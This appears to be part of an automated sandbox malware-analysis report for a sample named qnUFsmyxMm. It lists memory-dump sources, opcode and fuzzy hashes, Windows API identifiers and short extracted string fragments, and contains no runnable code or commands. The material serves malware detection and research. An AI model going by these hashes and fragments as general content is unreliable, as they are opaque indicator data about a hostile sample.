                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 07009b0892112185e7989d9d0e300b0d9895d0c607f9f6a91d2ebecd6b4d37ac
                                                                                                                                      • Instruction ID: 7db0e3e5046842f0f80356d7097ce73912a3477a97b92893cf39183b8551cbc7
                                                                                                                                      • Opcode Fuzzy Hash: 07009b0892112185e7989d9d0e300b0d9895d0c607f9f6a91d2ebecd6b4d37ac
                                                                                                                                      • Instruction Fuzzy Hash: 9F112973E511A04BD31CCF29CC5247A77A2D7D631531E826ED85793391D7394D0283D4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                      • Instruction ID: e94f9bd2cb49d4b662736c0f767d96ed4d0e189025bc22fa7d17e8b34f8d6972
                                                                                                                                      • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                      • Instruction Fuzzy Hash: 42110633B051D14EC3128D3C8410AA9BFF31AE3735F59439DE4B4AB2D2D62A8D8A8350
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 66116ca51413bb69ab787466092ab16813b115ef93d4b4d95bd9a6a1b53a0bf5
                                                                                                                                      • Instruction ID: 02f93506b46c07230e539de34094abdaac338c6c99eeff006c48c4b4631c497e
                                                                                                                                      • Opcode Fuzzy Hash: 66116ca51413bb69ab787466092ab16813b115ef93d4b4d95bd9a6a1b53a0bf5
                                                                                                                                      • Instruction Fuzzy Hash: 9F0171F2A003018BEB249E54E8C576BB2E9AF84714F18552CEC4957202EBBDFC05C7A1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 489737ced9f5b3d1228f944d6c5e588d0ae957e6daefbfb65c440208665353a8
                                                                                                                                      • Instruction ID: e595e1d7ecb9a874da4990c8ee361facff245bf5112a8d70097ccdb5e49ef789
                                                                                                                                      • Opcode Fuzzy Hash: 489737ced9f5b3d1228f944d6c5e588d0ae957e6daefbfb65c440208665353a8
                                                                                                                                      • Instruction Fuzzy Hash: 5B019E31608210EFE7598F14D481A7FB3F6BB9A710F54D52DE58623212D738EC02CB9A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d20f9f650e7c4d34dfa14add49e761b7461370708a85647bae00b4633b22f3a0
                                                                                                                                      • Instruction ID: a1715160078c5293bb5d31a27322ea6eb82c352824b3e30d06f3b4b6d9a77438
                                                                                                                                      • Opcode Fuzzy Hash: d20f9f650e7c4d34dfa14add49e761b7461370708a85647bae00b4633b22f3a0
                                                                                                                                      • Instruction Fuzzy Hash: 79F0A430209200CBE6544B24D59066FB3A5B7CA350F55D62FC58A33601CA38AC02CB9B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6bd664b363e94c5dd865838776f83db18b676a2759d0a73ca198eee73e3a124e
                                                                                                                                      • Instruction ID: 4205eccf029c45320bbcd578387cdc2822d9212aeb741ddbe76f5ca1447c4216
                                                                                                                                      • Opcode Fuzzy Hash: 6bd664b363e94c5dd865838776f83db18b676a2759d0a73ca198eee73e3a124e
                                                                                                                                      • Instruction Fuzzy Hash: 96F0B47B7186162BE610DD6ABCC0927B3D6E7C6304B098438EA41D3602D565E806C294
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 72eddc3b7f86ce2bb223a167adf4fe63a5fc415d7ab3c8b23cd0962adfa5fdca
                                                                                                                                      • Instruction ID: 13836da65b9162eaf272b73bb7317f70d139e26f6fac26d11a542fee86158856
                                                                                                                                      • Opcode Fuzzy Hash: 72eddc3b7f86ce2bb223a167adf4fe63a5fc415d7ab3c8b23cd0962adfa5fdca
                                                                                                                                      • Instruction Fuzzy Hash: 8BF062313086109BE6185A16E55267BF3F1ABD3310F15DA2DD78623611C63CE802C785
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3db557c48300bd2e4bb10f4ecaf3bbd4a4ff5d1d072b80e5f33ddeb984c17fc9
                                                                                                                                      • Instruction ID: 4f458c3f3435bd211c1ce5952c37ac47501a40184033515c897df02c95e08def
                                                                                                                                      • Opcode Fuzzy Hash: 3db557c48300bd2e4bb10f4ecaf3bbd4a4ff5d1d072b80e5f33ddeb984c17fc9
                                                                                                                                      • Instruction Fuzzy Hash: AAF0B47060A200BFDB145F2491D12BB73A1A76A300F90742CE9C227102C138E8058756
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocString
                                                                                                                                      • String ID: 0$3$6$?$K$N$R$R$W$X$Z$]$^$_$b$d$f$g$x
                                                                                                                                      • API String ID: 2525500382-3404372981
                                                                                                                                      • Opcode ID: df1fcc521058b075008bf3c7f83851fb8731b4dea2a3024a0158a8cf61a3bf8a
                                                                                                                                      • Instruction ID: bff77ce09dfcef79384666fa8555bbf021cf7412aed90f26a4e2e35bc2caab6b
                                                                                                                                      • Opcode Fuzzy Hash: df1fcc521058b075008bf3c7f83851fb8731b4dea2a3024a0158a8cf61a3bf8a
                                                                                                                                      • Instruction Fuzzy Hash: A791D32010CBD28AE332C73C885878FBED16BA7224F084B9DE4E95B2D2D3B54545C763
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitVariant
                                                                                                                                      • String ID: @$B$D$F$G$H$J$L$N$P$R$T$V
                                                                                                                                      • API String ID: 1927566239-89143503
                                                                                                                                      • Opcode ID: 6602753ec8bc0475595886a58ffadb876cc3d3f67f5b77c3d8de5886f065fc9e
                                                                                                                                      • Instruction ID: fbffbf7afbb1503a4cd07b5c6f6dca73d3e2473179c93e1639b15609f45bfd37
                                                                                                                                      • Opcode Fuzzy Hash: 6602753ec8bc0475595886a58ffadb876cc3d3f67f5b77c3d8de5886f065fc9e
                                                                                                                                      • Instruction Fuzzy Hash: 5541077110C7C18AD326DB78845879BBFE16BD6318F088A5DE1E94B3D2D7B88409C757
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Variant$ClearInit
                                                                                                                                      • String ID: X$c$l$m$s$w$y$y$|$~
                                                                                                                                      • API String ID: 2610073882-1425934243
                                                                                                                                      • Opcode ID: 563100e153728e5362fc5ece1522cd9b2966868a383cf75d361635b491170c0e
                                                                                                                                      • Instruction ID: 3ef62d4ec7a7dade1c9d8faeb6c9f4d7c76aa900f05dbe8f7897332354d86b14
                                                                                                                                      • Opcode Fuzzy Hash: 563100e153728e5362fc5ece1522cd9b2966868a383cf75d361635b491170c0e
                                                                                                                                      • Instruction Fuzzy Hash: 1A41463150C7C18ED335CB38884869EBFE1AB96324F084E6DE5E8872E6C6798545C767
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 7$8$EmQu$OZlk$pq
                                                                                                                                      • API String ID: 0-859822191
                                                                                                                                      • Opcode ID: 643f4438400cfd5481105c4073d77c82918abb0a23b2ac3f67de8cda5b9b7189
                                                                                                                                      • Instruction ID: fc7b993bded91ccbcd21972c8ba88763ea5cb5ff889a4d892030d1b1244f01cb
                                                                                                                                      • Opcode Fuzzy Hash: 643f4438400cfd5481105c4073d77c82918abb0a23b2ac3f67de8cda5b9b7189
                                                                                                                                      • Instruction Fuzzy Hash: E771076060C3D18BD3348B2984617EBBBD19F93315F28896DD4C94B382EB7D580ACB62
                                                                                                                                      APIs
                                                                                                                                      • _ValidateLocalCookies.LIBCMTD ref: 00B1E43D
                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIMED ref: 00B1E449
                                                                                                                                        • Part of subcall function 00B1ED30: __guard_icall_checks_enforced.LIBCMTD ref: 00B1ED36
                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMTD ref: 00B1E505
                                                                                                                                      • _ValidateLocalCookies.LIBCMTD ref: 00B1E570
                                                                                                                                      • _ValidateLocalCookies.LIBCMTD ref: 00B1E5C3
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3980260114.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3980242174.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980528943.0000000000B4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980554968.0000000000B5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980574224.0000000000B61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980631709.0000000000B63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_910000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record__guard_icall_checks_enforced
                                                                                                                                      • String ID: csm
                                                                                                                                      • API String ID: 3439031638-1018135373
                                                                                                                                      • Opcode ID: 3b900100162f11771ac5e78209d7d8422510e29c49c2f70ac9db94e1383d3602
                                                                                                                                      • Instruction ID: 25bb302b93020de74845f76ddecdc304ecb59a0cb8dd82553ea8e83da69b8e5c
                                                                                                                                      • Opcode Fuzzy Hash: 3b900100162f11771ac5e78209d7d8422510e29c49c2f70ac9db94e1383d3602
                                                                                                                                      • Instruction Fuzzy Hash: 2651DB74E00209DFCB04DF94D881AEEBBB2FF48314F548598E9256B391D735EA81CBA1
                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryExW.KERNEL32(00B1F437,00000000,00000800,?,?,00B1F437,00000000), ref: 00B1F53F
                                                                                                                                      • GetLastError.KERNEL32(?,?,00B1F437), ref: 00B1F553
                                                                                                                                      • _wcsncmp.LIBCMTD ref: 00B1F569
                                                                                                                                      • LoadLibraryExW.KERNEL32(00B1F437,00000000,00000000,?,00B1F437), ref: 00B1F57D
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3980260114.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3980242174.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980528943.0000000000B4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980554968.0000000000B5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980574224.0000000000B61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980631709.0000000000B63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_910000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LibraryLoad$ErrorLast_wcsncmp
                                                                                                                                      • String ID: api-ms-
                                                                                                                                      • API String ID: 4169583555-2084034818
                                                                                                                                      • Opcode ID: 80e0731cf1f7796e428332d288ef21772386fd01d6a259799901766a35d6ffe3
                                                                                                                                      • Instruction ID: d1f5408ad70240f22524e70f40bb88b1e8a0cc11a0d49b7871787511df4b432f
                                                                                                                                      • Opcode Fuzzy Hash: 80e0731cf1f7796e428332d288ef21772386fd01d6a259799901766a35d6ffe3
                                                                                                                                      • Instruction Fuzzy Hash: D9F09074A0420AFBDB008FA0DC4AFBD37E5AB49700F6081B0F909DB281DA70EB80C790